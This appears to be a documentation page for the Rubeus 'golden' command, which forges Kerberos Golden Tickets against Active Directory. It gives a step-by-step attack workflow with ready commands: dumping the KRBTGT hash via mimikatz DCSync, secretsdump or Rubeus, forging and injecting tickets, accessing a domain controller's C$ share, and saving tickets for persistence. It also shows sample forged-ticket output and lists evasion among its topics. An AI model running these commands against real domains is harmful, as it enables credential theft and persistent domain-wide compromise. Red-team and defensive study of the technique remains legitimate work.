Skip to main content
Golden Ticket attacks represent the pinnacle of Active Directory persistence, providing domain-wide access that persists even after password changes and system reboots.

Overview

Golden tickets are forged Ticket Granting Tickets (TGTs) created using the KRBTGT account’s password hash. These tickets provide persistent, high-privilege access to Active Directory environments by appearing completely legitimate to domain controllers.

Domain Persistence

Maintain access even after credential rotations

Full Privileges

Domain Admin level access across the environment

Stealth Operations

Tickets appear legitimate to security controls

Attack Prerequisites

1

Obtain KRBTGT Hash

Extract the KRBTGT account password hash through DCSync or other methods
2

Domain Information

Gather domain SID, domain name, and target user information
3

Ticket Creation

Forge the golden ticket with desired privileges and validity
4

Ticket Injection

Apply the forged ticket to gain domain-wide access

Syntax Variations

  • Manual Mode
  • LDAP Mode
  • Output & Injection
# Manual specification of all parameters
Rubeus.exe golden /user:admin /domain:corp.local /sid:S-1-5-21-123456789-987654321-111111111 /rc4:krbtgt_hash

Required Parameters

user
string
required
Username for the forged ticket

KRBTGT Authentication

Domain Information

Ticket Customization

Output Options

Response Format

  • Successful Creation
  • LDAP Discovery
  • Error Scenarios
[*] Action: Build TGT

[*] Building PAC

[*] Domain         : CORP.LOCAL (CORP)
[*] SID            : S-1-5-21-1234567890-987654321-111111111
[*] UserId         : 500
[*] Groups         : 512,513,518,519,520
[*] ServiceKey     : aes256_key_here
[*] ServiceKeyType : aes256_cts_hmac_sha1
[*] KDCKey         : aes256_key_here
[*] KDCKeyType     : aes256_cts_hmac_sha1
[*] Service        : krbtgt
[*] Target         : CORP.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'admin@CORP.LOCAL'

[*] AuthTime       : 10/25/2024 1:23:45 PM
[*] StartTime      : 10/25/2024 1:23:45 PM
[*] EndTime        : 10/25/2034 1:23:45 PM
[*] RenewTill      : 10/25/2034 1:23:45 PM

[*] base64(ticket.kirbi):
      doIFujCCBbagAwIBBaEDAgEWooIEujCCBLahggS2MIIEsqADAgEFoQwbCkNPUlAuTE9D
      QUyhHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmNvcnAubG9jYWyjggR9MIIEeaADAgESoQMC
      AQKiggRrBIIEZ2P+9l3v9...
PAC Information
object
Details about the Privilege Attribute Certificate
Encryption Details
object
Cryptographic information about the ticket
Ticket Timing
object
Validity periods for the forged ticket
Base64 Ticket
string
The forged TGT in base64 format for use or storage

Complete Attack Workflow

1

Obtain KRBTGT Hash

Extract KRBTGT credentials using DCSync or other methods:
# Using Mimikatz
mimikatz.exe "lsadump::dcsync /user:krbtgt"

# Using Impacket
secretsdump.py domain/user:password@dc01.corp.local

# Using Rubeus with delegation
Rubeus.exe dump /service:krbtgt /nowrap
2

Domain Information Gathering

Collect required domain information (if not using LDAP mode):
# Get domain SID
Get-ADDomain | Select-Object DomainSID

# Alternative method
whoami /user
3

Golden Ticket Creation

Create the forged TGT with appropriate parameters:
# LDAP mode (recommended)
Rubeus.exe golden /user:admin /rc4:krbtgt_ntlm_hash /ldap /ptt

# Manual mode
Rubeus.exe golden /user:admin /domain:corp.local /sid:S-1-5-21... /rc4:krbtgt_hash /ptt
4

Verification and Usage

Verify the ticket was created and test access:
# List current tickets
Rubeus.exe klist

# Test domain controller access
dir \\dc01.corp.local\c$

# Request service tickets
Rubeus.exe asktgs /service:cifs/fileserver.corp.local
5

Persistence Operations

Use the golden ticket for persistent access:
# Save ticket for later use
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /outfile:golden.kirbi

# Create additional tickets as needed
Rubeus.exe golden /user:serviceaccount /rc4:krbtgt_hash /ldap /groups:513,1001

Advanced Usage Scenarios

  • Stealth Operations
  • Cross-Domain Operations
  • Bulk Operations

OPSEC Considerations

High-Impact Attack: Golden tickets provide complete domain access and can be detected through various monitoring techniques.
  • Detection Vectors
  • Evasion Techniques
  • Defensive Countermeasures

Troubleshooting

Integration with Other Attacks

DCSync Integration

Use DCSync to obtain KRBTGT hash for golden ticket creation

Lateral Movement

Use golden tickets to access remote systems and services

Persistence Chains

Combine with other persistence techniques for redundant access

Privilege Escalation

Escalate from limited access to domain administrator privileges